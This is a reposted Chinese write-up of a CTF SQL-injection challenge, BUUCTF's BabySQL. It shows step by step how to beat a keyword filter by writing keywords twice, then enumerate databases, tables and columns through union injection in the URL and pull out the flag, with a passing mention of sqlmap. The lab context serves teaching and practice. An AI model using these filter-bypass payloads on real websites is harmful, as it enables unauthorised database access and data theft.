自学内容网 自学内容网

【BUUCTF】[极客大挑战 2019]BabySQL1

进入页面如下

万能密码用不了了


方法一:手工注入

尝试在url中使用union联合注入(详细解释见上篇文章中)

判断字段数

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1‘order by 3 #&password=1

发现or、by都被过滤

尝试双写绕过

有回显,判断为双写绕过
字段数为3

判断回显点在哪里

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1’ununionion seselectlect 1,2,3 #&password=1

显示‘3’,回显点在3处
查询数据库

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1'ununionion seselectlect 1,version(),database() #&password=1

 

显示数据库名

接下来查询表名

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1'ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_
schema.schemata #&password=1

查询表名

尝试ctf表

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorr
mation_schema.tables whwhereere table_schema='ctf' #&password=1

 

ctf数据库中存在flag表
查询字段名

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorr
mation_schema.columns whwhereere table_schema='ctf'#&password=1

 

查询flag字段的内容

http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1'ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#&password=1

最终得到flag

方法二:sqlmap注入

详情见上篇文章,命令方法大同小异 


原文地址:https://blog.csdn.net/2401_86760082/article/details/145190941

免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!